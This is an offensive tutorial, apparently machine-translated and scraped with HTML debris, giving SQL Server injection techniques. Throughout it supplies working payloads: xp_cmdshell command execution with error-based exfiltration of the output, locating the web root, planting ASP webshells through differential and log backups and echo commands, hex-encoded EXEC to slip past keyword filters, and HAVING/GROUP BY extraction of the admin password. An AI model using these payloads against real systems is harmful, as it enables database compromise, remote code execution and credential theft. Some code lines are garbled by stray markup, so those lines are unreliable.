SQL Server Injection Tips

One, SA permission to execute the command, how to get the results more quickly?

There are display bits

Display bit

In fact, the key here is not there is no display bit. EXEC master. xp_cmdshell ' systeminfo ' generates a number of rows when the data is written into a single table. And what we're going to do is how many lines through the display bit, or the error statement once burst out, the key here is the multi-line unity.

Method ①

01

02

BEGIN

"	;     if EXISTS ( select  table_name  from  information_schema.tables  where  table_name= ' test_1 ' ) Code class= "Brush keyword" >drop  table   test_1;

"	;     if EXISTS ( select  table_name  from  information_schema.tables  where  table_name= ' test_2 ' ) Code class= "Brush keyword" >drop  table   test_2;

05	createTABLEtest_1([output][varchar](1000));

06	inserttest_1 execmaster.dbo.xp_cmdshell ‘ipconfig /all‘;

07	DECLARE@result varchar(8000)

08	SET@result=‘~‘

"	;     select  @[email  protected]+ " + output  from  test_1   where  output >

ten	;     select   @result   as  result  into  test_2;

11	SELECTconvert(int,(select result fromtest_2));

12

END;

Analytical:
The meaning of this 6-9 sentence is to declare a temporary variable of @result;
Set the initial value to ' ~ '; test_1 the data data in sequence, the iteration condition is output> ', and the group synthesizes the new string, the string is separated by a space and finally copied to @result;
Then set @result to an alias, and then insert the test_2.
Last Error Echo
Ps:
MSSQL English Letter comparison size case-insensitive
MSSQL string comparison size and C language in the STR_CMP () the same reason

Method ② (injection point test succeeded, test platform SQL server2008-10.0.1600.22 (X64)

1	报错：AND(SELECT * FROM test_1 FORXML PATH(‘‘))=1--

2	显示：UNIONSELECT 1,(SELECT * FROM test_1 FORXML PATH(‘‘))--

Second, how to quickly find the Site directory (sa user)

SA User is down right

SA user has not been downgraded

Here it is reasonable to distinguish the right from the non-descending right, if there is no right to be lowered. So the permissions are very good can read some saved in the local configuration, if the permissions are lower, you can use the dir command to find.

Method ① (lowered right: – Pro-Test success):

1	CREATETABLEtest_1([output][varchar](1000));

2	INSERTtest_1 EXECmaster.dbo.xp_cmdshell ‘dir /s d:\web.config ‘;

3	AND(SELECT * FROM test_1 FORXML PATH(‘‘))=1;

Method ② (not lowered right –system– pro-Test success):

1	CREATETABLEtest_1([output][varchar](1000));

2	INSERTtest_1 EXECmaster.dbo.xp_cmdshell ‘cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root ‘;

3	AND(SELECT * FROM test_1 FORXML PATH(‘‘))=1;

Method ③ (Sa+system permission +iis7.0+iis7.5):

%systemroot%/system32/inetsrv/appcmd.exe list site--lists Web sites

%systemroot%\system32\inetsrv\appcmd.exe list vdir--List the physical path of a Web site

PS:%systemroot% represents c:\windows\

Third, how to use injection point Getshell

Method ① (differential backup) – Client affinity success – does not require permissions and can be tested at injection points that are not SA permissions

1	if Exis TS ( select  TABLE_NAME  Code class= "Brush keyword" >from  INFORMATION_SCHEMA.TABLES  Code class= "Brush keyword" >where  table_name= ' test_tmp ' ) drop   Table  test_tmp;

2	backup databaseXFData todisk = ‘D:\WebRoot\asp.bak‘;

3	createtable[dbo].[test_tmp] ([cmd] [image]);

4	insertintotest_tmp(cmd) values(0x3C25657865637574652872657175657374282261222929253E);

5	backup databaseXFData to disk=‘D:\WebRoot\asp.asp‘ WITHDIFFERENTIAL,FORMAT;

Method ② (Volume reduction) – Client affinity success – No permissions are required and can be tested at injection points that are not SA permissions

1	if Exis TS ( select  TABLE_NAME  Code class= "Brush keyword" >from  INFORMATION_SCHEMA.TABLES  Code class= "Brush keyword" >where  table_name= ' test_tmp ' ) drop   Table  test_tmp;

2	alterdatabase XFData setRECOVERY FULL;

3	createtabletest_tmp  (a image);

4	backup log XFData todisk = ‘D:\WebRoot\asp.bak‘ withinit;

5	insertinto test_tmp (a) values(0x3C25657865637574652872657175657374282261222929253EDA);

6	backup log XFData todisk = ‘D:\webroot\123.asp‘

Ps:
If you cannot back up, there is probably a problem with access rights. You can switch directory attempts
If the table exists, it cannot succeed, so first determine if the table exists and delete it if it exists.

Method ③ (Echo output one sentence Trojan) –sa permissions + Current user Write permission – Pro test success

1	echo ^<%eval request("pass")%^> >D:\%D1%A7%B7%D6%CF%B5%CD%B3\WebRoot\update.asp

PS: Because this is an injection point, you need to pay attention to the problem of coding. In general, the page encoding and database encoding is consistent (if inconsistent ~ ~ ~ I lose). Here I use a Chinese path to do the description.

Iv. How to avoid using keywords like select

Method ①: Hex Obfuscation

1	;DECLARE@S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC(@S);--

V. How to inject the login point how to get the background password fastest

01	1‘ HAVING 1=1-- #爆出表名

02

03	1‘GROUP BY username HAVING1=1--  # 爆出字段名

04

05	# User_Mess.Account

06

07	# User_Mess.PWD

08

09	1‘;select/**/convert(int,(select/**/top/**/1/**/Account/**/from/**/User_Mess))--

10	1‘;select/**/convert(int,(select/**/top/**/1/**/PWD/**/from/**/User_Mess/**/where/**/Account=‘admin‘))--

SQL Server Injection Tips